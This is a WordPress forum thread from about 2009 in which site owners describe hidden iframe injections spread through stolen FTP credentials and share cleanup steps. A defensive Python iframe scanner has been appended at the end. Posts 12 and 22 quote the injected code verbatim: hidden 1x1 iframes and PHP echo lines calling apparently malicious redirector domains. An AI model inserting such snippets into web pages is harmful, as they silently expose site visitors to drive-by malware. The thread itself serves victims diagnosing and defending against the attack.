WordPress hacked (31 posts)

  1. joeyconnick
    Member
    Posted 5 years ago #

    Just had a WordPress site of mine hacked earlier this morning; it had an iframe directing to lotultimatebet.cn inserted in the main *.php files throughout the site.

    Has anyone else experienced this? And does anyone know how to protect against whatever attack was used?

  2. tomontoast
    Member
    Posted 5 years ago #

    To guarantee that you won't get hacked, always use the latest version of WordPress, only use plugins, scripts and themes which you trust, and use a secure password for your WordPress admin, your database and your FTP. Just out of interest, what is the URL for your site?

  3. web1@naturopathy-uk.com
    Member
    Posted 5 years ago #

    I had the same thing. I am using WP 2.5.1 on the site. When upgrading to 2.7.1 I ran into problems on another site, so I didn't upgrade yet.

    In fact the one with 2.7.1 has been hacked too. I can't even get back into the back-end at the moment.

  4. tomontoast
    Member
    Posted 5 years ago #

    Could you post a link to that hacked site?

  5. bsains
    Member
    Posted 5 years ago #

    Be aware, joeyconnick, that you could possibly have a rootkit installed on your system.

    I've recently had issues with sites that I develop, albeit .Net sites, also being hacked and injected with the same/similar iframe code. Examples below:

    betbigwager.cn/in.cgi?income61
    lotultimatebet.cn/in.cgi?income60

    I believe that my system was compromised with a rootkit, and access details to the sites I manage were retrieved for the express interest of further propagating the rootkit. I say this because AVG picked up the presence of rootkit activity after I viewed an infected page.

    In regards to how I was compromised... I was not surfing inappropriate material, nor executing unknown files... I think it's probably a Firefox exploit... more than likely in an add-on. Good luck.

  6. joeyconnick
    Member
    Posted 5 years ago #

    Thanks for the info, bsains. I doubt it's a rootkit on my system but it might be one on the system of my friend whose blog it is. She's the one who usually interacts with it.

    We were also advised it might have been a brute-force attack against her ftp password.

    Yeah, the injected iframe stuff for us was the lotultimatebet site.

    I'll see if her anti-virus software has rootkit detection.

  7. UseShots
    Member
    Posted 5 years ago #

    Hi,

    This is not a WordPress exploit. Most likely the FTP password is compromised.

    I've just covered this particular exploit in my blog.
    http://blog.unmaskparasites.com/2009/04/15/malicious-income-iframes-from-cn-domains/

    1. Scan local computers for viruses and spyware
    2. Change FTP passwords
    3. Upload clean content from a backup

  8. JuneM0
    Member
    Posted 5 years ago #

    Euh, don't know. How do you know when your WP is hacked?

  9. Samuel B
    moderator
    Posted 5 years ago #

  10. TransPersonal
    Member
    Posted 5 years ago #

    For the future:

    1. Change your database prefix:

    http://semperfiwebdesign.com/documentation/wp-security-scan/change-wordpress-database-table-name-prefix/

    2. Change username from admin to something else

    3. Install the following plugins:

    -apache password protect:

    http://wordpress.org/extend/plugins/askapache-password-protect/

    -wordpress security scan:

    http://wordpress.org/extend/plugins/wp-security-scan/

    -wordpress firewall:

    http://www.seoegghead.com/software/wordpress-firewall.seo

    4. Disable ping response (ICMP) on your server (if you have the rights); this will prevent some DoS attacks:

    http://techgurulive.com/2008/11/06/how-to-disable-ping-response-linux/

  11. cnmadmin
    Member
    Posted 5 years ago #

    Thanks all for your answers. I've changed passwords, uploaded clean content, etc and am going through other steps to avoid wasting a day of my life again.

    Tomontoast, to answer your q:
    1. http://www.naturopathy-uk.com
    2. http://www.naturopathy.ie
    3. http://www.cnmstudent.com

  12. Gauhar Kachchhi
    Member
    Posted 5 years ago #

    Here is what appears in my index.php file:

    <?php
    /* Short and sweet */
    define('WP_USE_THEMES', true);
    require('./blog/wp-blog-header.php');
    
    echo "<iframe src=\"http://xtrarobotz.com/?click=BC0230\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
    
    echo "<iframe src=\"http://nipkelo.net/?click=E74A05\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
    
    echo "<iframe src=\"http://internetcountercheck.com/?click=14784531\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
    ?>
    <iframe src="http://hotslotpot.cn/in.cgi?income65" width=1 height=1 style="visibility: hidden"></iframe>
    <iframe src="http://hotslotpot.cn/in.cgi?income66" width=1 height=1 style="visibility: hidden"></iframe>
    <iframe src="http://hotslotpot.cn/in.cgi?income67" width=1 height=1 style="visibility: hidden"></iframe>
    <iframe src="http://betworldwager.cn/in.cgi?income68" width=1 height=1 style="visibility: hidden"></iframe>
    
    <iframe src="http://litecartop.cn/in.cgi?income70" width=1 height=1 style="visibility: hidden"></iframe>

    What should I do now? All my blogs have been similarly hacked, even non-WordPress domains.

  13. UseShots
    Member
    Posted 5 years ago #

    The income .cn iframes are not even PHP-related. They are added at the bottom of files like index.html, index.php, etc.

    The xtrarobotz/nipkelo/internetcountercheck hack is more sophisticated - it injects PHP code. I didn't investigate it, but since they usually appear on the same sites as the income .cn iframes, I assume the same compromised passwords are used.

  14. boatwizard
    Member
    Posted 5 years ago #

    We got hacked when we installed this WordPress plug-in: Make Tabbloid. We believe it takes advantage of the PDF creation tool and therefore allowed the hacker to gain access.

  15. Anonymous
    Unregistered
    Posted 5 years ago #

    Does anyone have a plugin which automatically sends an alert to the owner's email address if someone tries a wrong password on our blog, or has some other kind of instant notification? That would also be helpful. What do you guys think?

  16. TheMarque
    Member
    Posted 5 years ago #

    My website was also hacked this week and I've been spending the last two days fixing it. I think I finally got it resolved. They injected links into a lot of the theme files and then iframe injections into some posts. It was really weird. I removed the admin user, changed the passwords, and added a lot of plugins that were suggested in this blog: http://www.aboutonlinetips.com/wordpress-security-plugins/

    @Saaqi If you wanted a plugin to help with securing your log in, Stealth Login, Login LockDown, and Chap Secure Login are your best options.

  17. cdmarine
    Member
    Posted 5 years ago #

    I would like some clarification on changing the database prefix. These are the instructions listed at http://semperfiwebdesign.com/documentation/wp-security-scan/change-wordpress-database-table-name-prefix/ :

    1. Back up your WordPress database to a SQL file (you can use phpMyAdmin).
    2. Open that *.sql file (make another copy first) using a text editor, then find and replace all "wp_" prefixes with "something_".
    3. Now, drop all tables of your WordPress database (don't drop the database).
    4. Import the *.sql file which has been edited before into your WordPress database.
    5. And lastly, edit your wp-config.php file and change $table_prefix = 'wp_'; to $table_prefix = 'something_';
    6. You may find that your plugins are deactivated automatically when this happens, so you'll want to activate them again if that's the case... I'd recommend deactivating them prior to doing this anyway as a precaution.

    Can someone please explain to me what "drop all tables" means? Does that mean "delete"?

    I'm desperate here. I've been hacked repeatedly, and I'm at the end of my rope. I installed the WP Security Scan plugin and it tells me the only things wrong with my installation are that my prefixes are still set to "wp_" and that "file .htaccess does not exist in wp-admin/".

    Can someone tell me what the latter means, and what I should do about it? And please feel free to speak to me like I'm a 5-year-old, because I really do not know what I'm doing with this stuff.

    For your reference, here's what's been happening, and here's what I'm using:

    Problem:
    Repeatedly hacked by a group called "Red Virus." They appear to only be messing with the theme header.php file. They don't appear to be redirecting, or causing any other nefarious stuff to happen. It appears to be just changing the look of the page for attention and giggles. I say "appears" because I don't know jack about any of this, and God knows how they got in in the first place, so who knows what else they might have done elsewhere in my files.

    WordPress Version
    WP 2.7.1 (up to date)

    Theme:
    Atahualpa 3.2 (up to date)

    Plugins:
    Official StatCounter Plugin 1.0 (up to date)
    Sociable 3.1.1 (up to date)
    WP-Spamfree 2.0.0.6 (up to date)
    WP Security Scan 2.4 (up to date)

    Inactive Plugins:
    Addmarx 1.1.7
    Akismet 2.2.3
    Hello Dolly 1.5

  18. cdmarine
    Member
    Posted 5 years ago #

    Oh, and just for reference again...

    Each time it has happened, I have checked for the creation of new users, and that has not happened. However they're continuing to get in, it's not by creating a new user (they do helpfully change my password for me, though!).

    And my password this last time was just a bunch of random characters, so it's unlikely they're just cracking passwords.

  19. Inspired2Write
    Member
    Posted 5 years ago #

    Just discovered my site has been hacked today too. :( The problem first showed when a BadBehavior error message came up, indicating the headers were already sent, so I looked at my page source and saw the header iframe hack, which is showing the source from: worldnamebuy.cn.

    Although I can access my website's home page and other pages, I cannot access my WordPress admin panel when I attempt to login. The last time I accessed my site without any problem was late last week. I thought I would report here one of the last things I did last week from my admin panel, prior to this problem. I deleted 4 spam comments, which Akismet caught, but had gotten past BadBehavior.

    Prior to that I had updated my BadBehavior software from within the WordPress admin panel, but unfortunately after doing so I read over on BadBehavior's site that, depending on what version of WordPress and BadBehavior you had, you should instead do the upgrade via FTP, not from within the WordPress panel.

    I hope my information in regards to what I was doing last on my site before the hack may help someone avoid the same pain, assuming there may be any connection. I also use Firefox with numerous extensions, and will need to check those out.

  20. Inspired2Write
    Member
    Posted 5 years ago #

    UPDATE: Found additional iframe hacks and thought I would report here with my findings so far in order to assist others. Two of the files I found that were hacked (WP 2.7.1) were these:

    wp-index.php

    wp-includes/default-filters.php
    The hacker's iframe url was the very last line of code in the default filters file, so it could easily be overlooked. Replacing the contaminated default filters php file with a clean one enabled me to get back into my WP Admin panel, whereas I could not get in before. Much to do yet as I have not yet found the vulnerability that allowed the site to get hacked in the first place, but I'm suspecting a plug-in that I installed late last week. Hope this info helps someone!

  21. tthorp@brown.edu
    Member
    Posted 5 years ago #

    The iframe hack that I encountered is similar to those hacks posted here, but I have a few more details that I would like to share. The attack scanned all files on the web server (many of which were outside of WordPress and included PHP sites and also static HTML sites). The attacking script added an iframe to any files which had index, homepage or default in the filename, so in WordPress it injected the iframe into index.php, wp-admin/index-extra.php, wp-admin/index.php, wp-content/index.php, the index file for each theme and also wp-includes/default-filters.php.
    I'm not a web security expert, but I did notice that the modified sites were affected in alphabetical order, so I think the script was working through my ftp account. For this reason, I updated my password and switched my ftp service to only work over sftp, which encrypts my password.

  22. shankybaba
    Member
    Posted 5 years ago #

    Even I'm getting the same error.

    I checked my index.php file and found this code added into the file. There are many other PHP files which have been infected with the code below.

    // Silence is golden.
    <iframe src="http://2mj.pl:8080/ts/in.cgi?pepsi74" width=125 height=125 style="visibility: hidden"></iframe>

  23. gariben
    Member
    Posted 5 years ago #

    This is an FTP password compromise.

    Not related to WordPress.

    Make sure to upgrade your Adobe Reader to the latest version. You probably have Adobe Reader 8.0 and are using FileZilla.

  24. timeisenhauer
    Member
    Posted 5 years ago #

    I am getting the same issue, on not 1 but about 10 of my sites. Some are wordpress and some are .NET sites.

    This has been going on for 4 weeks. I am at my wits end.

    The wordpress sites continue to become infected, even after I clean them / update them with new clean files. The .NET sites also randomly become infected after they are cleaned.

    - I am the only person with access to the websites

    - I have reloaded both my laptop and my PC and cleaned them (in case there was some trojan or malware on my pc or laptop).

    - I have changed all FTP user/pass a number of times

    - I have removed (deleted) entire websites and restored them with clean files

    They continue to get this IFRAME injected into them.

    This is definitely related to FTP. I have mosso hosting and there are a number of 'root' directories accessible from one FTP login. All websites seem to be infected, one right after the other (any files with 'default' or 'index' in the file name).

    I do have a few of the websites at a point where they are not getting infected. It seems that if you can remove all those nasty IFRAMES, then you should be in the clear... although I can't be sure.

    I feel everyone's pain...this is very frustrating. Please ping me if anyone finds a surefire fix and I'll do the same. Many thanks.

  25. stuffiwrote
    Member
    Posted 5 years ago #

    Thank goodness it's not just me who is experiencing this issue with the iframe hack.

    Yesterday my blog was fine, today my homepage had a PHP parse error. I investigated and found the same thing, iframe code added to the bottom of heaps of pages.

    I thought I got rid of all the affected pages but every change I made threw up a new error.

    POSSIBLE FIRST?: Not sure if anyone else has experienced this (i'll be honest and admit I have not read every post above this!), but it could be a possible first or new approach for this hack.

    Not only did I get the iframe code inserted on the pages (mostly index.php but also heaps of others, even in the GD Star Rating plugin I use) but it also truncated lots of legit code on the page (possibly due to where it was inserted?).

    Anyway, I got sick of chasing down the code as it seems it's been inserted everywhere. I took extreme action and deleted my WP installation and SQL database (after backing up what I needed; blog entries, jpg images etc) and am presently reinstalling and configuring my blog all over again.

    Thankfully I am blessed with the fact my blog is relatively new. I can quickly repost and have the tweaked php code (where applicable) I made for customising the theme I use (Modicus remix) so hopefully I should be up and running again soon.

    Further I have now changed all usernames and passwords using an online password generator so now all my usernames and logins etc are insanely long and complex. Feck it, it's worth it so I hopefully do not have to go through this again. I feel for you all!

    FYI: I also use Filezilla (latest version) but do not use Adobe Reader, rather Foxit instead (much better I think).

    FYI2: I got a virus on my system the day before I discovered this problem. It was that bad I had to format my computer and reinstall WindowsXP. I am not sure if the virus I picked up could have contributed to the hack(?) as my blog was fine last night when I checked my Wassup stats.

  26. gariben
    Member
    Posted 5 years ago #

    @stuffiwrote

    I think it doesn't matter if you use Adobe Reader or not.

    I want to know if the Adobe Reader program exists on your computer. If so, what version? If not, my theory on the Adobe 8 and FileZilla hack is wrong.

  27. edrabbit
    Member
    Posted 5 years ago #

    I got hit too. Several sites, similar symptoms. Oddly enough not every site on my server was affected. Looks like trojan hack as I had a bunch of AVG warnings pop up when I went to read the news about thepiratebay getting sold. Looks like one of them got through and stole the passwords I had stored in Filezilla. :( I have Adobe 7 reader installed, but I don't think that matters. Another person I talked to uses cuteftp and he got hacked too. I would wager that it doesn't matter which ftp software you're using. If it's popular, they're probably targeting it.

    I'm probably just going to format and reinstall windows on the desktop machine that was compromised and then restore backups on the web servers, change passwords, etc.

    If you want to chat about things, share info, etc., join us on Freenode (irc.freenode.com) in channel #microsotf.cn. If you don't have an IRC client, you can use the webchat: http://java.freenode.net//index.php?channel=microsotf.cn

  28. homecoder
    Member
    Posted 5 years ago #

    A good friend of mine was hit too. He found it odd that all of HIS sites were being affected, but nobody else and he blamed wordpress himself, he did a backup and removed it.

    After figuring out that there were no scripts on his server (server side), PHP or CGI or whatever, he finally realized that it was being done via FTP.

    I was able to take a look at the code being executed, as I was under Linux (with JavaScript shut off), without any Adobe PDF, and sure enough, the executed code was an iframe that led to another page, with an iframe, which used a script to check if PDF was available, and load a PDF file, again, hidden with CSS.

    From what I've read around, this is a vulnerability allowing for remote code execution, including but not limited to Key Loggers.

    The issue went away when I had my friend download a linux live CD, Slax, http://www.slax.org and he was able to use the available Avast! Antivirus and it cleaned quite a few viruses / trojans, he then changed ALL ftp passwords, and his web hosts control panel password, all within Linux.

    Another idea would be if you have a web host with a control panel, see if the attackers had created any additional FTP accounts (which are in many cases available).

    As a note, however, Linux is not impervious to viruses but most virus programmers will attack the masses (Windows).

    The strangest part of the whole thing, however, is that the iframes that were injected into the WordPress files didn't come complete, missing key elements, thus they actually BROKE WordPress.

    I am unsure how this happened, but this behavior actually HELPED me to figure out what the issue is.

    Best of luck to everyone who has this issue, I will shortly be putting together a blog post to help those who are having this issue work through it.

  29. sitesecure
    Member
    Posted 5 years ago #

    If you are having trouble removing the scripts from your pages and/or getting your site back into Google's good graces, you might want to check out http://www.iframehack.com . Their blog provides quite a bit of information on the hack, including a list of the domains that these hidden iframes are directing traffic to, and provide a service that removes the malicious content from all of the pages on your site that were affected by the virus/trojan and assists with getting the site reincluded in Google results and having the "attack site" label removed.

    Hope this helps someone!

  30. deepjava
    Member
    Posted 4 years ago #

    I think it is not WordPress code but some trojan on the Windows machine which keeps a watch on your network layer and scans all communication.

    I could figure this out when I asked for the FTP log from my hosting service provider. My login details were being used from all over the world, even while I was sleeping :(

    What to do when your website is infected with such iframe malware
    ================================================================
    1. Immediately change your FTP passwords.
    2. Clean up your local machine from all the viruses, trojans, malware, rootkits etc.
    3. Install a good antivirus with updates and a firewall with limited ports open.
    4. Do netstat to keep a watch on invalid trojan operations running in the background.
    5. Hope you have a backup of your site. If yes, then log in to your website and delete all the content.
    6. If you do not have a backup, download all the files from your website and scan for iframes. Remove unwanted iframes or malware tags.
    7. Upload the correct copy of files to the server.
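
As an added example (not code from this thread, from WordPress or from any poster), here is a small defender-side scanner for the cleanup step "download all the files and scan for iframes" (posts 7 and 30), built around what the thread reports: hidden 1x1 or visibility:hidden iframes appended after the closing `?>` or wrapped in a PHP echo, the `in.cgi?income` redirector path, and the filename pattern from post 21 (index, homepage, default). The sample file contents are constructed and the hostnames in them are placeholders, not indicators.

```python
import re
import sys
from pathlib import Path

# Post 21: the injector touched files with index, homepage or default in the name.
TARGET_NAME = re.compile(r"index|homepage|default", re.IGNORECASE)
# One <iframe ...> opening tag; [^>]* stops at the tag end, so escaped quotes
# inside a PHP echo "..." string do not interfere.
IFRAME_TAG = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
# Marks that hide the frame from the visitor, plus the in.cgi?income redirector path.
HIDDEN_MARKS = re.compile(
    r"width=[\"']?1[\"']?\s+height=[\"']?1[\"']?"  # 1x1 pixel frame
    r"|visibility:\s*hidden|display:\s*none"      # hidden via CSS
    r"|in\.cgi\?income\d+", re.IGNORECASE)

def find_injected_iframes(text):
    """Return [(line_no, tag)] for every hidden-looking iframe in a file's text."""
    hits = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for match in IFRAME_TAG.finditer(line):
            if HIDDEN_MARKS.search(match.group(0)):
                hits.append((line_no, match.group(0)))
    return hits

def trailing_html_after_php_close(text):
    """Non-blank text after the last '?>': raw markup appended there is what
    produced the 'headers already sent' errors several posters saw."""
    idx = text.rfind("?>")
    return text[idx + 2:].strip() if idx != -1 else ""

def is_likely_target(filename):
    return bool(TARGET_NAME.search(filename))

def scan_files(files):
    """files: iterable of (path, text) -> {path: [(line_no, tag), ...]} for infected files."""
    return {path: hits for path, text in files if (hits := find_injected_iframes(text))}

def scan_tree(root):
    """Scan a downloaded copy of the web root (post 30, step 6)."""
    root = Path(root)
    return scan_files((str(p.relative_to(root)), p.read_text(errors="replace"))
                      for p in root.rglob("*")
                      if p.is_file() and p.suffix.lower() in {".php", ".html", ".htm"})

# Constructed sample modelled on the index.php quoted in post 12; hostnames are placeholders.
SAMPLE_INDEX_PHP = """<?php
/* Short and sweet */
define('WP_USE_THEMES', true);
require('./blog/wp-blog-header.php');
echo "<iframe src=\\"http://redirector.example/?click=X\\" width=1 height=1 style=\\"visibility:hidden;position:absolute\\"></iframe>";
?>
<iframe src="http://redirector.example/in.cgi?income65" width=1 height=1 style="visibility: hidden"></iframe>
"""
# A legitimate, visible embed must not be flagged.
CLEAN_PAGE = '<iframe src="https://video.example/embed" width=560 height=315></iframe>\n'

if __name__ == "__main__":
    for path, hits in sorted(scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items()):
        note = " [targeted filename]" if is_likely_target(Path(path).name) else ""
        for line_no, tag in hits:
            print(f"{path}:{line_no}{note}: {tag[:80]}")
```

Run it against a local download of the site, not the live server, and compare each flagged file against a known-clean copy before replacing it; a match is a lead to review, not proof on its own.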

Topic Closed

This topic has been closed to new replies.
